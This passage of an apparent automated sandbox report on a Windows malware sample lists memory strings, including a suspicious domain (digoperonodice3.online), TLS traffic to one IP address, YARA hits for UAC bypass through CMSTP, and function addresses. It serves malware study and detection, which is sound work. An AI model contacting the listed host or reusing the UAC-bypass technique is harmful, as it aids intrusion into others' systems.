                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401E0000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.???.xx/?search=%s
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C77A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.00000000054DB000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.00000000027BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401E0000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.softwareok.com
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.softwareok.com/?Download=Find.Same.Images.OK
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401E0000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.softwareok.de
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.softwareok.de/?Download=Find.Same.Images.OK
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000000.1734507600.00000001401F4000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0
                  Source: Localdockerv3.exe, 00000008.00000000.1734434382.0000000140156000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.surfok.de/
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                  Source: Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                  Source: Localdockerv3.exe, 00000008.00000002.2160225088.00000000004EF000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2112620225.0000000000588000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1997936658.0000000000588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://digoperonodice3.online/
                  Source: Localdockerv3.exe, 00000008.00000003.2112620225.0000000000588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://digoperonodice3.online/L
                  Source: Localdockerv3.exe, 00000008.00000003.1897374947.0000000000528000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1897886861.0000000000525000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1916979579.0000000000528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://digoperonodice3.online/Ohio-Vall9~
                  Source: Localdockerv3.exe, 00000008.00000002.2160661904.0000000000AD3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://digoperonodice3.online/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay
                  Source: Localdockerv3.exe, 00000008.00000003.2091618343.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1997936658.0000000000588000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2112620225.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000014.00000003.2200733958.00000000004B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://digoperonodice3.online/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=
                  Source: Localdockerv3.exe, 00000008.00000002.2169892760.0000000007F50000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://digoperonodice3.online:443
                  Source: Localdockerv3.exe, 00000008.00000003.2112186023.0000000000525000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1997936658.0000000000525000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2159559087.0000000000528000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000014.00000003.2200733958.00000000004B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://digoperonodice3.online:443/Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4i
                  Source: Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: hv.exe, 00000002.00000002.1486704045.000000000C7D0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776755377.0000000005524000.00000004.00000800.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                  Source: Localdockerv3.exe, 00000008.00000003.1975782187.0000000000B3E000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975392028.0000000000B3E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1458693302.000000000D1E4000.00000004.00000001.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1450461576.0000000001546000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.handyviewer.com
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://www.handyviewer.com/check-version.php?version=openS
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://www.handyviewer.com/contact.htmlopenSV
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000006F3000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://www.handyviewer.com/donate.htmlopen
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://www.handyviewer.com/donate.htmlopenS
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://www.handyviewer.com/manual/openU
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://www.handyviewer.com/openS
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmp, hv.exe, 00000003.00000000.1464088467.00000000007E9000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://www.handyviewer.com/openSV
                  Source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000002695000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000003.00000000.1464088467.00000000006F3000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://www.handyviewer.com/openhM
                  Source: hv.exe, 00000002.00000000.1449010901.0000000000E21000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.handyviewer.com/openhME
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49711 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49713 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49714 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49716 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49717 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49718 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49719 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49721 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49723 version: TLS 1.2

                  System Summary

                  barindex
                  Source: 10.2.cmd.exe.2d607f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.Localdockerv3.exe.284faed.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 10.2.cmd.exe.2c34a28.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 20.2.Localdockerv3.exe.2788a20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 20.2.Localdockerv3.exe.27ce6ed.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.Localdockerv3.exe.28506ed.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.Localdockerv3.exe.280aa20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 20.2.Localdockerv3.exe.27cdaed.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: 0_2_00404FAA0_2_00404FAA
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: 0_2_0041206B0_2_0041206B
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: 0_2_0041022D0_2_0041022D
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: 0_2_00411F910_2_00411F91
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeCode function: 2_2_6CAF88562_2_6CAF8856
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeCode function: 2_2_6CBD28602_2_6CBD2860
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeCode function: 2_2_6CBD51C02_2_6CBD51C0
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeCode function: 2_2_6CBCE5302_2_6CBCE530
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeCode function: 2_2_6CBCDD302_2_6CBCDD30
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeCode function: 2_2_6CBD4AD02_2_6CBD4AD0
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeCode function: 2_2_6CBCE6102_2_6CBCE610
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeCode function: 2_2_6CBF06702_2_6CBF0670
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeCode function: 2_2_6CBD1E502_2_6CBD1E50
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeCode function: 2_2_6CBD4A402_2_6CBD4A40
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeCode function: 2_2_6CBD23302_2_6CBD2330
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeCode function: 2_2_6CBD27302_2_6CBD2730
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeCode function: 2_2_6CBD17702_2_6CBD1770
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeCode function: 2_2_6CBCD7602_2_6CBCD760
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 3_2_6C3BD4003_2_6C3BD400
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 3_2_6C3B28603_2_6C3B2860
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 3_2_6C3BD4E03_2_6C3BD4E0
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 3_2_6C3ADD303_2_6C3ADD30
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 3_2_6C3AE5303_2_6C3AE530
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 3_2_6C3B51C03_2_6C3B51C0
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 3_2_6C3AE6103_2_6C3AE610
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 3_2_6C3B1E503_2_6C3B1E50
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 3_2_6C3B4A403_2_6C3B4A40
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 3_2_6C3B3AB03_2_6C3B3AB0
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 3_2_6C3B4AD03_2_6C3B4AD0
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 3_2_6C3B32C03_2_6C3B32C0
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 3_2_6C3B27303_2_6C3B2730
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 3_2_6C3B23303_2_6C3B2330
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 3_2_6C3B17703_2_6C3B1770
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 3_2_6C3AD7603_2_6C3AD760
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_000000014000BFFC8_2_000000014000BFFC
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_000000014001D0008_2_000000014001D000
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_00000001400014248_2_0000000140001424
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_000000014000B8248_2_000000014000B824
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_000000014002F8388_2_000000014002F838
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_0000000140008C3C8_2_0000000140008C3C
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_000000014000D8488_2_000000014000D848
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_00000001400054508_2_0000000140005450
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_000000014000D4588_2_000000014000D458
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_00000001400210688_2_0000000140021068
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_000000014001048C8_2_000000014001048C
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_000000014000909C8_2_000000014000909C
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_00000001400EE4C48_2_00000001400EE4C4
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_00000001400238F88_2_00000001400238F8
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_000000014001A9B88_2_000000014001A9B8
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_00000001400041C88_2_00000001400041C8
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_00000001400231CC8_2_00000001400231CC
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_000000014000A5E08_2_000000014000A5E0
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_0000000140021A008_2_0000000140021A00
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_000000014000E2148_2_000000014000E214
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_0000000140022E308_2_0000000140022E30
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_0000000140024A788_2_0000000140024A78
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_000000014002267C8_2_000000014002267C
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_000000014001AE888_2_000000014001AE88
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_000000014001F2A48_2_000000014001F2A4
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_0000000140011EF48_2_0000000140011EF4
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_000000014001DF448_2_000000014001DF44
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_0000000140040F488_2_0000000140040F48
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_000000014000A3788_2_000000014000A378
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_00000001400133908_2_0000000140013390
